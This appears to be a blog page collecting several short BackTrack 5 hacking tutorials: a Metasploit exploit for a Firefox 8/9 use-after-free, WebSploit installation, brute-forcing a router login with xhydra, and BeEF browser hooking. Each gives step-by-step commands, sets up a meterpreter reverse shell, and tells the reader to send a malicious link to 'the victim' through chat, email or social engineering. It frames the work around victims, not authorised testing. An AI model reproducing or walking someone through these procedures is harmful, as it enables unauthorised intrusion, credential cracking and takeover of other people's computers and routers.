BackTrack 5 Tutorials

Hacking Windows XP with Firefox 8/9 Attribute Child Removed() Use-After-Free

0
1 year ago
by Raj Chandel in ,

This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1. Removal of child nodes from the nsDOMAttribute can allow for a child to still be accessible after removal due to a premature notification of AttributeChildRemoved. Since mFirstChild is not set to NULL until after this call is made, this means the removed child will be accessible after it has been removed. By carefully manipulating the memory layout, this can lead to arbitrary code execution.

Exploit Targets

Mozilla Firefox 9.0.1

Win SP2

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/Mozilla_attribchildremoved

Msf exploit (Mozilla_attribchildremoved)>set payload windows/meterpreter/reverse_tcp

Msf exploit (Mozilla_attribchildremoved)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (Mozilla_attribchildremoved)>set srvhost 192.168.1.3 (This must be an address on the local machine)

Msf exploit (Mozilla_attribchildremoved)>set uripath balancesheet (The Url to use for this exploit)

Msf exploit (Mozilla_attribchildremoved)>exploit

Now an URL you should give to your victim http://192.168.1.3:8080/balancesheet

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

 

How to Install WebSploit Toolkit in Backtrack

4
1 year ago
by Raj Chandel in ,

WebSploit Is an Open Source Project for Scan and Analysis Remote System from Vulnerability

Description:

  • Autopwn – Used From Metasploit For Scan and Exploit Target Service
  • wmap – Scan, Crawler Target Used From Metasploit wmap Plugin
  • format infector – inject reverse & bind payload into file format
  • phpmyadmin – Search Target phpmyadmin login page
  • lfi – Scan, Bypass local file inclusion Vulnerability & can be bypass some WAF
  • apache users – search server username directory (if use from apache webserver)
  • Dir Bruter – brute target directory with wordlist
  • admin finder – search admin & login page of target
  • MLITM Attack – Man Left In The Middle, XSS Phishing Attacks
  • MITM – Man In The Middle Attack
  • Java Applet Attack – Java Signed Applet Attack
  • MFOD Attack Vector – Middle Finger Of Doom Attack Vector
  • USB Infection Attack – Create Executable Backdoor For Infect USB For Windows
How to Install WebSploit in Backtrack
  • First download WebSploit toolkit from here
  • Now unzip the file folder and copied WebSploit V.1.6 Toolkit in the directory web under pentest
  • Now change the permission of WebSploit file in WebSploit folder. Right click on websploit file and select properties

Select the Permission tab and click on Allow executing file as program now click on close

Now open your backtrack terminal and type

cd /pentest/web/websploit

./websploit

How to Break Router password using Backtrack

5
1 year ago
by Raj Chandel in

Open your Backtrack terminal and Type xhydra and press enter

In the target tab, select
Single Target: 192.168.1.1
Protocol: http-get

In passwords tab, select
username: admin (because most of the routers have default username as admin) 

In the passwords, select the password list option and browse to select your passwords file. Here I have used my custom password file.

In Specific tab select

http/https URL: http://192.168.1.1/

Now select start tab and click on start button, the password cracking begins and result is as follows

Open the browser and type http://192.168.1.1/

Put the password u got from xhydra and get administrative access to the router

 

How to Hack Remote Web Browser with BeEF (Browser Exploitation Framework)

2
1 year ago
by Raj Chandel in ,

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. The Browser Exploitation Framework (BeEF) is a powerful professional security tool.

BeEF focuses on leveraging browser vulnerabilities to assess the security posture of a target. This project is developed solely for lawful research and penetration testing. BeEF hooks one or more web browsers as beachheads for the launching of directed command modules. Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors.

How to Install Browser Exploitation Framework in BacTrack

First Open Your backtrack and Follow these path

Applications->Backtrack–>Exploitation Tools->Social Engineering Tools->BEEF XSS Framework->BeEF Installer

Now Beef is Successfully Install in your PC

 

How to use Browser Exploitation Framework 

Open your backtrack and Follow these path

Applications->Backtrack–>Exploitation Tools->Social Engineering Tools->BEEF XSS Framework->BeEF

Then copied the URL and launched it in the browser (this is my URL based on the IP of my virtual box machine yours will be different)

http://192.168.1.3:3000/ui/panel (beef is the user name and password)

Send the link http://192.168.1.3:3000/demos/basic.html to the victim via chat or email or any social engineering technique to the victim

Now you can get access of victim pc

Go to Top